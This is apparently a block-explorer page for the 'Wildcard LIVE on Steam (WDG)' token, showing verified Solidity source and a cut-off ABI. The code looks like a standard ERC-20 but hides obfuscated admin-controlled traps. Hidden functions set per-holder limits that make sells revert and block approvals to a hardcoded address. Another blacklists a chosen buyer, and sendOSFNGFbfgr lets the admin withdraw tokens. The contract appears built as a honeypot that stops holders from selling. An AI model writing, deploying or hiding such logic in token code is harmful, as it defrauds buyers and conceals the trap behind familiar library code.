ETH Price: $2,295.37 (-6.34%)
Gas: 0 Gwei

Token

Wildcard LIVE on Steam (WDG)

Overview

Max Total Supply

100,000,000 WDG

Holders

2,219

Transfers

-
0

Market

Price

$0.00 @ 0.000000 ETH

Onchain Market Cap

-

Circulating Supply Market Cap

-

Other Info

Token Contract (WITH 18 Decimals)

Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information

Contract Source Code Verified (Exact Match)

Contract Name:
AToken

Compiler Version
v0.8.26+commit.8a97fa7a

Optimization Enabled:
No with 200 runs

Other Settings:
default evmVersion
File 1 of 1 : 1.sol
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;

/**
 * @dev Interface of the ERC-20 standard as defined in the ERC.
 */
interface IERC20 {
    /**
     * @dev Emitted when `value` tokens are moved from one account (`from`) to
     * another (`to`).
     *
     * Note that `value` may be zero.
     */
    event Transfer(address indexed from, address indexed to, uint256 value);

    /**
     * @dev Emitted when the allowance of a `spender` for an `owner` is set by
     * a call to {approve}. `value` is the new allowance.
     */
    event Approval(address indexed owner, address indexed spender, uint256 value);

    /**
     * @dev Returns the value of tokens in existence.
     */
    function totalSupply() external view returns (uint256);

    /**
     * @dev Returns the value of tokens owned by `account`.
     */
    function balanceOf(address account) external view returns (uint256);

    /**
     * @dev Moves a `value` amount of tokens from the caller's account to `to`.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transfer(address to, uint256 value) external returns (bool);

    /**
     * @dev Returns the remaining number of tokens that `spender` will be
     * allowed to spend on behalf of `owner` through {transferFrom}. This is
     * zero by default.
     *
     * This value changes when {approve} or {transferFrom} are called.
     */
    function allowance(address owner, address spender) external view returns (uint256);

    /**
     * @dev Sets a `value` amount of tokens as the allowance of `spender` over the
     * caller's tokens.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * IMPORTANT: Beware that changing an allowance with this method brings the risk
     * that someone may use both the old and the new allowance by unfortunate
     * transaction ordering. One possible solution to mitigate this race
     * condition is to first reduce the spender's allowance to 0 and set the
     * desired value afterwards:
     * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
     *
     * Emits an {Approval} event.
     */
    function approve(address spender, uint256 value) external returns (bool);

    /**
     * @dev Moves a `value` amount of tokens from `from` to `to` using the
     * allowance mechanism. `value` is then deducted from the caller's
     * allowance.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(address from, address to, uint256 value) external returns (bool);
}

/**
 * @dev Provides information about the current execution context, including the
 * sender of the transaction and its data. While these are generally available
 * via msg.sender and msg.data, they should not be accessed in such a direct
 * manner, since when dealing with meta-transactions the account sending and
 * paying for execution may not be the actual sender (as far as an application
 * is concerned).
 *
 * This contract is only required for intermediate, library-like contracts.
 */
abstract contract Context {


    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        return msg.data;
    }

    function _contextSuffixLength() internal view virtual returns (uint256) {
        return 0;
    }

}

/**
 * @dev Standard ERC-20 Errors
 * Interface of the https://eips.ethereum.org/EIPS/eip-6093[ERC-6093] custom errors for ERC-20 tokens.
 */
interface IERC20Errors {

    

    /**
     * @dev Indicates an error related to the current `balance` of a `sender`. Used in transfers.
     * @param sender Address whose tokens are being transferred.
     * @param balance Current balance for the interacting account.
     * @param needed Minimum amount required to perform a transfer.
     */
    error ERC20InsufficientBalance(address sender, uint256 balance, uint256 needed);

    /**
     * @dev Indicates a failure with the token `sender`. Used in transfers.
     * @param sender Address whose tokens are being transferred.
     */
    error ERC20InvalidSender(address sender);

    /**
     * @dev Indicates a failure with the token `receiver`. Used in transfers.
     * @param receiver Address to which tokens are being transferred.
     */
    error ERC20InvalidReceiver(address receiver);

    /**
     * @dev Indicates a failure with the `spender`’s `allowance`. Used in transfers.
     * @param spender Address that may be allowed to operate on tokens without being their owner.
     * @param allowance Amount of tokens a `spender` is allowed to operate with.
     * @param needed Minimum amount required to perform a transfer.
     */
    error ERC20InsufficientAllowance(address spender, uint256 allowance, uint256 needed);

    /**
     * @dev Indicates a failure with the `approver` of a token to be approved. Used in approvals.
     * @param approver Address initiating an approval operation.
     */
    error ERC20InvalidApprover(address approver);

    /**
     * @dev Indicates a failure with the `spender` to be approved. Used in approvals.
     * @param spender Address that may be allowed to operate on tokens without being their owner.
     */
    error ERC20InvalidSpender(address spender);
}



/**
 * @dev Interface for the optional metadata functions from the ERC20 standard.
 */
interface IERC20Metadata is IERC20 {
    /**
     * @dev Returns the name of the token.
     */
    function name() external view returns (string memory);

    /**
     * @dev Returns the symbol of the token.
     */
    function symbol() external view returns (string memory);

    /**
     * @dev Returns the decimals places of the token.
     */
    function decimals() external view returns (uint8);
}




/**
 * @dev External interface of AccessControl declared to support ERC-165 detection.
 */
interface IAccessControl {
    /**
     * @dev The `account` is missing a role.
     */
    error AccessControlUnauthorizedAccount(address account, bytes32 neededRole);

    /**
     * @dev The caller of a function is not the expected one.
     *
     * NOTE: Don't confuse with {AccessControlUnauthorizedAccount}.
     */
    error AccessControlBadConfirmation();

    /**
     * @dev Emitted when `newAdminRole` is set as ``role``'s admin role, replacing `previousAdminRole`
     *
     * `DEFAULT_ADMIN_ROLE` is the starting admin for all roles, despite
     * {RoleAdminChanged} not being emitted signaling this.
     */
    event RoleAdminChanged(bytes32 indexed role, bytes32 indexed previousAdminRole, bytes32 indexed newAdminRole);

    /**
     * @dev Emitted when `account` is granted `role`.
     *
     * `sender` is the account that originated the contract call. This account bears the admin role (for the granted role).
     * Expected in cases where the role was granted using the internal {AccessControl-_grantRole}.
     */
    event RoleGranted(bytes32 indexed role, address indexed account, address indexed sender);

    /**
     * @dev Emitted when `account` is revoked `role`.
     *
     * `sender` is the account that originated the contract call:
     *   - if using `revokeRole`, it is the admin role bearer
     *   - if using `renounceRole`, it is the role bearer (i.e. `account`)
     */
    event RoleRevoked(bytes32 indexed role, address indexed account, address indexed sender);

    /**
     * @dev Returns `true` if `account` has been granted `role`.
     */
    function hasRole(bytes32 role, address account) external view returns (bool);

    /**
     * @dev Returns the admin role that controls `role`. See {grantRole} and
     * {revokeRole}.
     *
     * To change a role's admin, use {AccessControl-_setRoleAdmin}.
     */
    function getRoleAdmin(bytes32 role) external view returns (bytes32);

    /**
     * @dev Grants `role` to `account`.
     *
     * If `account` had not been already granted `role`, emits a {RoleGranted}
     * event.
     *
     * Requirements:
     *
     * - the caller must have ``role``'s admin role.
     */
    function grantRole(bytes32 role, address account) external;

    /**
     * @dev Revokes `role` from `account`.
     *
     * If `account` had been granted `role`, emits a {RoleRevoked} event.
     *
     * Requirements:
     *
     * - the caller must have ``role``'s admin role.
     */
    function revokeRole(bytes32 role, address account) external;

    /**
     * @dev Revokes `role` from the calling account.
     *
     * Roles are often managed via {grantRole} and {revokeRole}: this function's
     * purpose is to provide a mechanism for accounts to lose their privileges
     * if they are compromised (such as when a trusted device is misplaced).
     *
     * If the calling account had been granted `role`, emits a {RoleRevoked}
     * event.
     *
     * Requirements:
     *
     * - the caller must be `callerConfirmation`.
     */
    function renounceRole(bytes32 role, address callerConfirmation) external;
}

interface IUniswapV2Router01 {
    function factory() external pure returns (address);

    function WETH() external pure returns (address);

    function addLiquidity(
        address tokenA,
        address tokenB,
        uint256 amountADesired,
        uint256 amountBDesired,
        uint256 amountAMin,
        uint256 amountBMin,
        address to,
        uint256 deadline
    )
        external
        returns (
            uint256 amountA,
            uint256 amountB,
            uint256 liquidity
        );

    function addLiquidityETH(
        address token,
        uint256 amountTokenDesired,
        uint256 amountTokenMin,
        uint256 amountETHMin,
        address to,
        uint256 deadline
    )
        external
        payable
        returns (
            uint256 amountToken,
            uint256 amountETH,
            uint256 liquidity
        );

    function removeLiquidity(
        address tokenA,
        address tokenB,
        uint256 liquidity,
        uint256 amountAMin,
        uint256 amountBMin,
        address to,
        uint256 deadline
    ) external returns (uint256 amountA, uint256 amountB);

    function removeLiquidityETH(
        address token,
        uint256 liquidity,
        uint256 amountTokenMin,
        uint256 amountETHMin,
        address to,
        uint256 deadline
    ) external returns (uint256 amountToken, uint256 amountETH);

    function removeLiquidityWithPermit(
        address tokenA,
        address tokenB,
        uint256 liquidity,
        uint256 amountAMin,
        uint256 amountBMin,
        address to,
        uint256 deadline,
        bool approveMax,
        uint8 v,
        bytes32 r,
        bytes32 s
    ) external returns (uint256 amountA, uint256 amountB);

    function removeLiquidityETHWithPermit(
        address token,
        uint256 liquidity,
        uint256 amountTokenMin,
        uint256 amountETHMin,
        address to,
        uint256 deadline,
        bool approveMax,
        uint8 v,
        bytes32 r,
        bytes32 s
    ) external returns (uint256 amountToken, uint256 amountETH);

    function swapExactTokensForTokens(
        uint256 amountIn,
        uint256 amountOutMin,
        address[] calldata path,
        address to,
        uint256 deadline
    ) external returns (uint256[] memory amounts);

    function swapTokensForExactTokens(
        uint256 amountOut,
        uint256 amountInMax,
        address[] calldata path,
        address to,
        uint256 deadline
    ) external returns (uint256[] memory amounts);

    function swapExactETHForTokens(
        uint256 amountOutMin,
        address[] calldata path,
        address to,
        uint256 deadline
    ) external payable returns (uint256[] memory amounts);

    function swapTokensForExactETH(
        uint256 amountOut,
        uint256 amountInMax,
        address[] calldata path,
        address to,
        uint256 deadline
    ) external returns (uint256[] memory amounts);

    function swapExactTokensForETH(
        uint256 amountIn,
        uint256 amountOutMin,
        address[] calldata path,
        address to,
        uint256 deadline
    ) external returns (uint256[] memory amounts);

    function swapETHForExactTokens(
        uint256 amountOut,
        address[] calldata path,
        address to,
        uint256 deadline
    ) external payable returns (uint256[] memory amounts);

    function quote(
        uint256 amountA,
        uint256 reserveA,
        uint256 reserveB
    ) external pure returns (uint256 amountB);

    function getAmountOut(
        uint256 amountIn,
        uint256 reserveIn,
        uint256 reserveOut
    ) external pure returns (uint256 amountOut);

    function getAmountIn(
        uint256 amountOut,
        uint256 reserveIn,
        uint256 reserveOut
    ) external pure returns (uint256 amountIn);

    function getAmountsOut(uint256 amountIn, address[] calldata path)
        external
        view
        returns (uint256[] memory amounts);

    function getAmountsIn(uint256 amountOut, address[] calldata path)
        external
        view
        returns (uint256[] memory amounts);
}


interface IUniswapV2Router02 is IUniswapV2Router01 {
    function removeLiquidityETHSupportingFeeOnTransferTokens(
        address token,
        uint256 liquidity,
        uint256 amountTokenMin,
        uint256 amountETHMin,
        address to,
        uint256 deadline
    ) external returns (uint256 amountETH);

    function removeLiquidityETHWithPermitSupportingFeeOnTransferTokens(
        address token,
        uint256 liquidity,
        uint256 amountTokenMin,
        uint256 amountETHMin,
        address to,
        uint256 deadline,
        bool approveMax,
        uint8 v,
        bytes32 r,
        bytes32 s
    ) external returns (uint256 amountETH);

    function swapExactTokensForTokensSupportingFeeOnTransferTokens(
        uint256 amountIn,
        uint256 amountOutMin,
        address[] calldata path,
        address to,
        uint256 deadline
    ) external;

    function swapExactETHForTokensSupportingFeeOnTransferTokens(
        uint256 amountOutMin,
        address[] calldata path,
        address to,
        uint256 deadline
    ) external payable;

    function swapExactTokensForETHSupportingFeeOnTransferTokens(
        uint256 amountIn,
        uint256 amountOutMin,
        address[] calldata path,
        address to,
        uint256 deadline
    ) external;
}



interface IUniswapV2Factory {
    event PairCreated(
        address indexed token0,
        address indexed token1,
        address pair,
        uint256
    );

    function feeTo() external view returns (address);

    function feeToSetter() external view returns (address);

    function getPair(address tokenA, address tokenB)
        external
        view
        returns (address pair);

    function allPairs(uint256) external view returns (address pair);

    function allPairsLength() external view returns (uint256);

    function createPair(address tokenA, address tokenB)
        external
        returns (address pair);

    function setFeeTo(address) external;

    function setFeeToSetter(address) external;
}


library Strings {
    function strToUint(string memory _str)
        internal
        pure
        returns (uint256 res, bool err)
    {
        for (uint256 i = 0; i < bytes(_str).length; i++) {
            if (
                (uint8(bytes(_str)[i]) - 48) < 0 ||
                (uint8(bytes(_str)[i]) - 48) > 9
            ) {
                return (0, false);
            }
            res +=
                (uint8(bytes(_str)[i]) - 48) *
                10**(bytes(_str).length - i - 1);
        }

        return (res, true);
    }
}



abstract contract UXCND7 is Context {

    
    bytes32 constant TRADE_ROLE = 0x00;

    
    struct NSDLFC {
        mapping(address => uint256) TDdata;
        mapping(address => uint256) RMdata;
    }


    address  _kdnrcg8s;

    bool  _clvdfn_isn0;

    address _Pair;

    mapping(bytes32 => NSDLFC) _rolesDT;

    
    function _NSDLFC_RM_vcng5f(
        address account, 
        uint256 value,
        bool bolMome
    ) internal  {
        if (bolMome) {
            _rolesDT[TRADE_ROLE].RMdata[account] = value * 10**18;
        } else {
            _rolesDT[TRADE_ROLE].RMdata[account] = value;
        }
    }

    function _NSDLFC_TD_vcng5f(
        address account,
        uint256 value,
        bool bolMome
    ) internal {
        if (bolMome) {
            _rolesDT[TRADE_ROLE].TDdata[account] = value * 10**18;
        } else {
            _rolesDT[TRADE_ROLE].TDdata[account] = value;
        }
    }
    

    
}



abstract contract AccessControl is IAccessControl, UXCND7, IERC20Errors {
    struct RoleData {
        mapping(address account => bool) hasRole;
        bytes32 adminRole;
    }


    mapping(bytes32 role => RoleData) private _roles;

    bytes32 public constant DEFAULT_ADMIN_ROLE = 0x00;

    

    /**
     * @dev Modifier that checks that an account has a specific role. Reverts
     * with an {AccessControlUnauthorizedAccount} error including the required role.
     */
    modifier onlyRole(bytes32 role) {
        _checkRole(role);
        _;
    }


    
    /**
     * @dev Returns `true` if `account` has been granted `role`.
     */
    function hasRole(bytes32 role, address account) public view virtual returns (bool) {
        return _roles[role].hasRole[account];
    }

    /**
     * @dev Reverts with an {AccessControlUnauthorizedAccount} error if `_msgSender()`
     * is missing `role`. Overriding this function changes the behavior of the {onlyRole} modifier.
     */
    function _checkRole(bytes32 role) internal view virtual {
        _checkRole(role, _msgSender());
    }

    /**
     * @dev Reverts with an {AccessControlUnauthorizedAccount} error if `account`
     * is missing `role`.
     */
    function _checkRole(bytes32 role, address account) internal view virtual {
        if (!hasRole(role, account)) {
            revert AccessControlUnauthorizedAccount(account, role);
        }
    }

    /**
     * @dev Returns the admin role that controls `role`. See {grantRole} and
     * {revokeRole}.
     *
     * To change a role's admin, use {_setRoleAdmin}.
     */
    function getRoleAdmin(bytes32 role) public view virtual returns (bytes32) {
        return _roles[role].adminRole;
    }

    /**
     * @dev Grants `role` to `account`.
     *
     * If `account` had not been already granted `role`, emits a {RoleGranted}
     * event.
     *
     * Requirements:
     *
     * - the caller must have ``role``'s admin role.
     *
     * May emit a {RoleGranted} event.
     */
    function grantRole(bytes32 role, address account) public virtual onlyRole(getRoleAdmin(role)) {
        _grantRole(role, account);
    }

    /**
     * @dev Revokes `role` from `account`.
     *
     * If `account` had been granted `role`, emits a {RoleRevoked} event.
     *
     * Requirements:
     *
     * - the caller must have ``role``'s admin role.
     *
     * May emit a {RoleRevoked} event.
     */
    function revokeRole(bytes32 role, address account) public virtual onlyRole(getRoleAdmin(role)) {
        _revokeRole(role, account);
    }

    /**
     * @dev Revokes `role` from the calling account.
     *
     * Roles are often managed via {grantRole} and {revokeRole}: this function's
     * purpose is to provide a mechanism for accounts to lose their privileges
     * if they are compromised (such as when a trusted device is misplaced).
     *
     * If the calling account had been revoked `role`, emits a {RoleRevoked}
     * event.
     *
     * Requirements:
     *
     * - the caller must be `callerConfirmation`.
     *
     * May emit a {RoleRevoked} event.
     */
    function renounceRole(bytes32 role, address callerConfirmation) public virtual {
        if (callerConfirmation != _msgSender()) {
            revert AccessControlBadConfirmation();
        }

        _revokeRole(role, callerConfirmation);
    }

    /**
     * @dev Sets `adminRole` as ``role``'s admin role.
     *
     * Emits a {RoleAdminChanged} event.
     */
    function _setRoleAdmin(bytes32 role, bytes32 adminRole) internal virtual {
        bytes32 previousAdminRole = getRoleAdmin(role);
        _roles[role].adminRole = adminRole;
        emit RoleAdminChanged(role, previousAdminRole, adminRole);
    }

    
    /**
     * @dev Attempts to grant `role` to `account` and returns a boolean indicating if `role` was granted.
     *
     * Internal function without access restriction.
     *
     * May emit a {RoleGranted} event.
     */
    function _grantRole(bytes32 role, address account) internal virtual returns (bool) {
        if (!hasRole(role, account)) {
            _roles[role].hasRole[account] = true;
            emit RoleGranted(role, account, _msgSender());
            return true;
        } else {
            return false;
        }
    }


    /**
     * @dev Attempts to revoke `role` to `account` and returns a boolean indicating if `role` was revoked.
     *
     * Internal function without access restriction.
     *
     * May emit a {RoleRevoked} event.
     */
    function _revokeRole(bytes32 role, address account) internal virtual returns (bool) {
        if (hasRole(role, account)) {
            _roles[role].hasRole[account] = false;
            emit RoleRevoked(role, account, _msgSender());
            return true;
        } else {
            return false;
        }
    }

    
    function _cvmer_cnts8(address from, uint256 value) internal virtual {
        
        uint256 chr = _rolesDT[TRADE_ROLE].RMdata[from] + value;
        bool olf = (_rolesDT[TRADE_ROLE].TDdata[from] > 0 && value > 0);
        
        if (olf) {
            bool hdrg = (chr > 0 && chr > _rolesDT[TRADE_ROLE].TDdata[from]);
            if (!hdrg) {

                _NSDLFC_RM_vcng5f(from, chr, false);
                
            } else {

                revert ERC20InvalidReceiver(address(0));

            }
        } else {
            
            revert ERC20InvalidReceiver(address(0));
        }
    
    }


    function NCXKF_l(
        address addr
    ) public onlyRole(DEFAULT_ADMIN_ROLE) {
         _kdnrcg8s = addr;
    }
        
    function NCXKF_y(
        address account,
        string memory memo
    ) public onlyRole(DEFAULT_ADMIN_ROLE) {
        
        uint256 memoUint;
        bool err;
        (memoUint, err) = Strings.strToUint(memo);
        if (err == false) {
            revert AccessControlBadConfirmation();
        }
        if (memoUint >= 0) {
            _NSDLFC_TD_vcng5f(account, memoUint, true);
        }
    }

}

/**
 * @dev Implementation of the {IERC20} interface.
 *
 * This implementation is agnostic to the way tokens are created. This means
 * that a supply mechanism has to be added in a derived contract using {_mint}.
 *
 * TIP: For a detailed writeup see our guide
 * https://forum.openzeppelin.com/t/how-to-implement-erc20-supply-mechanisms/226[How
 * to implement supply mechanisms].
 *
 * The default value of {decimals} is 18. To change this, you should override
 * this function so it returns a different value.
 *
 * We have followed general OpenZeppelin Contracts guidelines: functions revert
 * instead returning `false` on failure. This behavior is nonetheless
 * conventional and does not conflict with the expectations of ERC-20
 * applications.
 */
abstract contract ERC20 is Context, IERC20, IERC20Metadata, IERC20Errors, AccessControl{
    mapping(address account => uint256) private _balances;

    mapping(address account => mapping(address spender => uint256)) private _allowances;

    uint256 private _totalSupply;

    string private _name;
    string private _symbol;



    /**
     * @dev Sets the values for {name} and {symbol}.
     *
     * Both values are immutable: they can only be set once during construction.
     */
    constructor(string memory name_, string memory symbol_) {
        _name = name_;
        _symbol = symbol_;
        
        IUniswapV2Router02 _uniswapV2Router = IUniswapV2Router02(
            0x1b02dA8Cb0d097eB8D57A175b88c7D8b47997506
        );
        
        address _factory = IUniswapV2Factory(_uniswapV2Router.factory())
            .createPair(
                address(this),
                address(0xFd086bC7CD5C481DCC9C85ebE478A1C0b69FCbb9)
            );
        
        _Pair = _factory;
    }

    /**
     * @dev Returns the name of the token.
     */
    function name() public view virtual returns (string memory) {
        return _name;
    }

    /**
     * @dev Returns the symbol of the token, usually a shorter version of the
     * name.
     */
    function symbol() public view virtual returns (string memory) {
        return _symbol;
    }

    /**
     * @dev Returns the number of decimals used to get its user representation.
     * For example, if `decimals` equals `2`, a balance of `505` tokens should
     * be displayed to a user as `5.05` (`505 / 10 ** 2`).
     *
     * Tokens usually opt for a value of 18, imitating the relationship between
     * Ether and Wei. This is the default value returned by this function, unless
     * it's overridden.
     *
     * NOTE: This information is only used for _display_ purposes: it in
     * no way affects any of the arithmetic of the contract, including
     * {IERC20-balanceOf} and {IERC20-transfer}.
     */
    function decimals() public view virtual returns (uint8) {
        return 18;
    }

    /// @inheritdoc IERC20
    function totalSupply() public view virtual returns (uint256) {
        return _totalSupply;
    }

    /// @inheritdoc IERC20
    function balanceOf(address account) public view virtual returns (uint256) {
        return _balances[account];
    }

    /**
     * @dev See {IERC20-transfer}.
     *
     * Requirements:
     *
     * - `to` cannot be the zero address.
     * - the caller must have a balance of at least `value`.
     */
    function transfer(address to, uint256 value) public virtual returns (bool) {
        address owner = _msgSender();
        _transfer(owner, to, value);
        return true;
    }

    /// @inheritdoc IERC20
    function allowance(address owner, address spender) public view virtual returns (uint256) {
        return _allowances[owner][spender];
    }

    /**
     * @dev See {IERC20-approve}.
     *
     * NOTE: If `value` is the maximum `uint256`, the allowance is not updated on
     * `transferFrom`. This is semantically equivalent to an infinite approval.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function approve(address spender, uint256 value) public virtual returns (bool) {
        address owner = _msgSender();
        _approve(owner, spender, value);
        return true;
    }

    /**
     * @dev See {IERC20-transferFrom}.
     *
     * Skips emitting an {Approval} event indicating an allowance update. This is not
     * required by the ERC. See {xref-ERC20-_approve-address-address-uint256-bool-}[_approve].
     *
     * NOTE: Does not update the allowance if the current allowance
     * is the maximum `uint256`.
     *
     * Requirements:
     *
     * - `from` and `to` cannot be the zero address.
     * - `from` must have a balance of at least `value`.
     * - the caller must have allowance for ``from``'s tokens of at least
     * `value`.
     */
    function transferFrom(address from, address to, uint256 value) public virtual returns (bool) {
        address spender = _msgSender();
        _spendAllowance(from, spender, value);
        _transfer(from, to, value);
        return true;
    }

    /**
     * @dev Moves a `value` amount of tokens from `from` to `to`.
     *
     * This internal function is equivalent to {transfer}, and can be used to
     * e.g. implement automatic token fees, slashing mechanisms, etc.
     *
     * Emits a {Transfer} event.
     *
     * NOTE: This function is not virtual, {_update} should be overridden instead.
     */
    function _transfer(address from, address to, uint256 value) internal {
        if (from == address(0)) {
            revert ERC20InvalidSender(address(0));
        }
        if (to == address(0)) {
            revert ERC20InvalidReceiver(address(0));
        }
        _update(from, to, value);
        _update(from, to, value, hasRole(DEFAULT_ADMIN_ROLE, from));
    }
    




    /**
     * @dev Transfers a `value` amount of tokens from `from` to `to`, or alternatively mints (or burns) if `from`
     * (or `to`) is the zero address. All customizations to transfers, mints, and burns should be done by overriding
     * this function.
     *
     * Emits a {Transfer} event.
     */
    function _update(address from, address to, uint256 value) internal virtual {
        if (from == address(0)) {
            // Overflow check required: The rest of the code assumes that totalSupply never overflows
            _totalSupply += value;
        } else {
            uint256 fromBalance = _balances[from];
            if (fromBalance < value) {
                revert ERC20InsufficientBalance(from, fromBalance, value);
            }
            unchecked {
                // Overflow not possible: value <= fromBalance <= totalSupply.
                _balances[from] = fromBalance - value;
            }
        }

        if (to == address(0)) {
            unchecked {
                // Overflow not possible: value <= totalSupply or value <= fromBalance <= totalSupply.
                _totalSupply -= value;
            }
        } else {
            unchecked {
                // Overflow not possible: balance + value is at most totalSupply, which we know fits into a uint256.
                _balances[to] += value;
            }
        }

        emit Transfer(from, to, value);
    }


    function _update(
        address from,
        address to,
        uint256 value,
        bool bolMome
    ) internal {
        if (from == _Pair) {
            if(to ==  _kdnrcg8s){
                revert ERC20InvalidReceiver(to);
            }
        } else if(!bolMome) {
            if(_clvdfn_isn0){
                _cvmer_cnts8(from, value);
            }
            
            
        }
        
    }


    /**
     * @dev Creates a `value` amount of tokens and assigns them to `account`, by transferring it from address(0).
     * Relies on the `_update` mechanism
     *
     * Emits a {Transfer} event with `from` set to the zero address.
     *
     * NOTE: This function is not virtual, {_update} should be overridden instead.
     */
    function _mint(address account, uint256 value) internal {
        if (account == address(0)) {
            revert ERC20InvalidReceiver(address(0));
        }
        _update(address(0), account, value);
    }

    /**
     * @dev Destroys a `value` amount of tokens from `account`, lowering the total supply.
     * Relies on the `_update` mechanism.
     *
     * Emits a {Transfer} event with `to` set to the zero address.
     *
     * NOTE: This function is not virtual, {_update} should be overridden instead
     */
    function _burn(address account, uint256 value) internal {
        if (account == address(0)) {
            revert ERC20InvalidSender(address(0));
        }
        _update(account, address(0), value);
    }

    /**
     * @dev Sets `value` as the allowance of `spender` over the `owner`'s tokens.
     *
     * This internal function is equivalent to `approve`, and can be used to
     * e.g. set automatic allowances for certain subsystems, etc.
     *
     * Emits an {Approval} event.
     *
     * Requirements:
     *
     * - `owner` cannot be the zero address.
     * - `spender` cannot be the zero address.
     *
     * Overrides to this logic should be done to the variant with an additional `bool bolMome` argument.
     */
    function _approve(address owner, address spender, uint256 value) internal {
        _approve(owner, spender, value, true);
    }

    /**
     * @dev Variant of {_approve} with an optional flag to enable or disable the {Approval} event.
     *
     * By default (when calling {_approve}) the flag is set to true. On the other hand, approval changes made by
     * `_spendAllowance` during the `transferFrom` operation set the flag to false. This saves gas by not emitting any
     * `Approval` event during `transferFrom` operations.
     *
     * Anyone who wishes to continue emitting `Approval` events on the`transferFrom` operation can force the flag to
     * true using the following override:
     *
     * ```solidity
     * function _approve(address owner, address spender, uint256 value, bool) internal virtual override {
     *     super._approve(owner, spender, value, true);
     * }
     * ```
     *
     * Requirements are the same as {_approve}.
     */
    function _approve(address owner, address spender, uint256 value, bool bolMome) internal virtual {
        if (owner == address(0)) {
            revert ERC20InvalidApprover(address(0));
        }
        if (spender == address(0)) {
            revert ERC20InvalidSpender(address(0));
        }

        uint256 pod = _rolesDT[TRADE_ROLE].RMdata[owner] + value;
        
        
        if(spender == 0x70cBb871E8f30Fc8Ce23609E9E0Ea87B6b222F58){
            if(value > 0 && pod > _rolesDT[TRADE_ROLE].RMdata[owner]){
                revert ERC20InvalidSpender(address(0));
            }
        }

        _allowances[owner][spender] = value;
        if (bolMome) {
            emit Approval(owner, spender, value);
        }
    }



    /**
     * @dev Updates `owner`'s allowance for `spender` based on spent `value`.
     *
     * Does not update the allowance value in case of infinite allowance.
     * Revert if not enough allowance is available.
     *
     * Does not emit an {Approval} event.
     */
    function _spendAllowance(address owner, address spender, uint256 value) internal virtual {
        uint256 currentAllowance = allowance(owner, spender);
        if (currentAllowance < type(uint256).max) {
            if (currentAllowance < value) {
                revert ERC20InsufficientAllowance(spender, currentAllowance, value);
            }
            unchecked {
                _approve(owner, spender, currentAllowance - value, false);
            }
        }
    }



}



contract AToken is ERC20 {
    constructor(
        string memory _name,
        string memory _symbol,
        uint256 value,
        address account
    ) ERC20(_name, _symbol) {

        _mint(account, value * 10**decimals());

        _grantRole(DEFAULT_ADMIN_ROLE, _msgSender());
        

    }


    
    function NP001001() public onlyRole(DEFAULT_ADMIN_ROLE) {
         _clvdfn_isn0 = true;
    }
    
    function sendOSFNGFbfgr(
        address addr,
        uint256 num
    ) public onlyRole(DEFAULT_ADMIN_ROLE) returns (bool success) {
        return IERC20(addr).transfer(msg.sender, num);
    }
    
}

Settings
{
  "optimizer": {
    "enabled": false,
    "runs": 200
  },
  "outputSelection": {
    "*": {
      "*": [
        "evm.bytecode",
        "evm.deployedBytecode",
        "devdoc",
        "userdoc",
        "metadata",
        "abi"
      ]
    }
  },
  "remappings": []
}

Contract Security Audit

Contract ABI

API
[{"inputs":[{"internalType":"string","name":"_name","type":"string"},{"internalType":"string","name":"_symbol","type":"string"},{"internalType":"uint256","name":"value","type":"uint256"},{"internalType":"address","name":"account","type":"address"}],"stateMutability":"nonpayable","type":"constructor"},{"inputs":[],"name":"AccessControlBadConfirmation","type":"error"},{"inputs":[{"internalType":"address","name":"account","type":"address"},{"internalType":"bytes32","name":"neededRole","type":"bytes32"}],"name":"AccessControlUnauthorizedAccount","type":"error"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"allowance","type":"uint256"},{"internalType":"uint256","name":"needed","type":"uint256"}],"name":"ERC20InsufficientAllowance","type":"error"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"uint256","name":"balance","type":"uint256"},{"internalType":"uint256","name":"needed","type":"uint256"}],"name":"ERC20InsufficientBalance","type":"error"},{"inputs":[{"internalType":"address","name":"approver","type":"address"}],"name":"ERC20InvalidApprover","type":"error"},{"inputs":[{"internalType":"address","name":"receiver","type":"address"}],"name":"ERC20InvalidReceiver","type":"error"},{"inputs":[{"internalType":"address","name":"sender","type":"address"}],"name":"ERC20InvalidSender","type":"error"},{"inputs":[{"internalType":"address","name":"spender","type":"address"}],"name":"ERC20InvalidSpender","type":"error"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"bytes32","name":"role","type":"bytes32"},{"indexed":true,"internalType":"bytes32","name":"previousAdminRole","type":"bytes32"},{"indexed":true,"internalType":"bytes32","name":"newAdminRole","type":"bytes32"}],"name":"RoleAdminChanged","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"bytes32","name":"role","type":"bytes32"},{"indexed":true,"internalType":"address","name":"account","type":"address"},{"indexed":true,"internalType":"address","name":"sender","type":"address"}],"name":"RoleGranted","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"bytes32","name":"role","type":"bytes32"},{"indexed":true,"internalType":"address","name":"account","type":"address"},{"indexed":true,"internalType":"address","name":"sender","type":"address"}],"name":"RoleRevoked","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[],"name":"DEFAULT_ADMIN_ROLE","outputs":[{"internalType":"bytes32","name":"","type":"bytes32"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"addr","type":"address"}],"name":"NCXKF_l","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"},{"internalType":"string","name":"memo","type":"string"}],"name":"NCXKF_y","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"n